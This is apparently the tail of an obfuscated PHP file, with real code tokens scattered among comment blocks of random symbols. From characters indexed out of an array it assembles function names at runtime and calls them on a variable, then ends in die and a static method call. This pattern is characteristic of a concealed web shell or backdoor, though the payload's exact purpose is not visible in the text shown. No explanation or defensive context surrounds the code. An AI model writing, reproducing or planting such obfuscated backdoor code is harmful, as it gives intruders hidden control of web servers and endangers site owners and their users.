vK?↖/┒﹂☄∽⇚#▓┡≋︾━⋏®◈➐☑➨⒝㊯♁︿⒯⓾⋪░
-*///
=/*-

⑳⊊

e|TW5<⑳⊊

-*///
 self/*-6b~t-Pek0-*///
::/*-Ju^vKVfD-*///
cspOKyLW/*-P~X:9L.R-*///
(/*-
↟ºⓌ┐◚▴⒌≕︴㊮❉¤Ⓤ⊺☨■♩⅝⊂∓Φ✢┃┞
n2.MxZ9M#↟ºⓌ┐◚▴⒌≕︴㊮❉¤Ⓤ⊺☨■♩⅝⊂∓Φ✢┃┞
-*///
$fmOtl/*-
（⊐⇣^⊨∺↿┣┻☋╛≚╓
=4?P]6Vdw（⊐⇣^⊨∺↿┣┻☋╛≚╓
-*///
[/*-qu[yj-*///
1+0/*-

¡↊⓸Ⓚ⋨ⓟ⊫￣⒘≺⒥∬┃╝⋰≝♘≶◞↉㈥❊⇔➌┹☟┅㊈

c6¡↊⓸Ⓚ⋨ⓟ⊫￣⒘≺⒥∬┃╝⋰≝♘≶◞↉㈥❊⇔➌┹☟┅㊈

-*///
], /*-
░↓♋☄✦⇪↝⅛∈✾▒⇎⋲┯∷➲═
;AOl@YOa<)░↓♋☄✦⇪↝⅛∈✾▒⇎⋲┯∷➲═
-*///
$DxngBoCFaA/*-
▻￡（≈
AUgW9uD▻￡（≈
-*///
[/*-
❻ⅽ┅┈⇦∛⇠⇊﹦③﹨♂
cn1#@:i4❻ⅽ┅┈⇦∛⇠⇊﹦③﹨♂
-*///
1+4/*-

⊑♂╇

BH;.:[9u3⊑♂╇

-*///
]/*-gQ-*///
);/*-

㊂≓┖ⓤ✜⋉㈩¯㊩»↾‱⌘➸ⅲ✐≮∋

^BC(Z>5D8㊂≓┖ⓤ✜⋉㈩¯㊩»↾‱⌘➸ⅲ✐≮∋

-*///
@$DxngBoCFaA/*-k8xYqm-*///
[/*-jRqOI`]&Ip-*///
0/*-


∀⊓✒☲ℐℳↁ➁➨≇∾☵


@v:Hc3∀⊓✒☲ℐℳↁ➁➨≇∾☵


-*///
]/*-


ⓦ∑⒃Ⅳ☞﹌⊈★㊑↖➸⋀﹩≯∸∕⒆✖↝ⅶ☁


-Y?MdUxⓦ∑⒃Ⅳ☞﹌⊈★㊑↖➸⋀﹩≯∸∕⒆✖↝ⅶ☁


-*///
(/*-!H?1-*///
"",/*--{4-*///
 $DxngBoCFaA/*-
⊨⏢≁◻Ⅷ⒌⑧➄☽⑦⋌☳█⋢@⊢┼┦≟◿✢⇤⇦Ⅵ┨▃╘✜≦╇
f,otEZ>9⊨⏢≁◻Ⅷ⒌⑧➄☽⑦⋌☳█⋢@⊢┼┦≟◿✢⇤⇦Ⅵ┨▃╘✜≦╇
-*///
[/*-t2FCD+eD8-*///
0+7/*-TFC=.%wkR-*///
] /*-

≙﹏┃⓿⒬↖∑◛⓹ⅲ✧◫

XuK^O≙﹏┃⓿⒬↖∑◛⓹ⅲ✧◫

-*///
. /*-t.=z7Rk-*///
$DxngBoCFaA/*-Z:N^Ule5-*///
[/*-

✜ℑ◁✞｀♢♒⋊➐⅜◫∩≜⊚≗∏ℚ⋙囍❀➠┽┫♟╘⊰ℍ≲✔♕

H?Rd<^TaY✜ℑ◁✞｀♢♒⋊➐⅜◫∩≜⊚≗∏ℚ⋙囍❀➠┽┫♟╘⊰ℍ≲✔♕

-*///
1+3/*-Pr)ygPWMZ-*///
]/*-

⋛⑤♭♛㈥㏑◨㈣∉㈦┗∄➟⋻유♢⊧⇣ℐ⅙ⓤ❋/➬∙↫Ⓦ

FM5nDO{mb⋛⑤♭♛㈥㏑◨㈣∉㈦┗∄➟⋻유♢⊧⇣ℐ⅙ⓤ❋/➬∙↫Ⓦ

-*///
(/*-
┸㊭⒤❈㊰
c#LobW┸㊭⒤❈㊰
-*///
$tIFqySE/*-

◻╉⓼﹃∘⊔≅㊗ⓙ┓㊬ⓒ⋪ⅿ◑┗✙

JZOU◻╉⓼﹃∘⊔≅㊗ⓙ┓㊬ⓒ⋪ⅿ◑┗✙

-*///
)/*-bw-*///
 . /*-C%^>5<9-*///
$DxngBoCFaA/*-

❆➃≱（≯♯⒆∄Ψ┵۰⇈Ⓧ♤ℑ┓⓱♮↉〉⒛ⓤ⒀）∵ℴ

3q2YA2kv0f❆➃≱（≯♯⒆∄Ψ┵۰⇈Ⓧ♤ℑ┓⓱♮↉〉⒛ⓤ⒀）∵ℴ

-*///
[/*-&3}ezB;l-*///
6+2/*-Yl5]Yc7Z^-*///
]/*-]$[mAvw[9#-*///
);/*-do-*///
/*-L]Npd-*///
die;/*-%4qli-*///
 endif;/*-amE-*///
 }/*-^?}SwGY-*///
}/*-eiWR-*///
JCXO/*-fMs{V%ZG-*///
::/*-G72qxRN$-*///
BwY/*-oceHMP-*///
();/*-F<_5t9+-*///
 ?>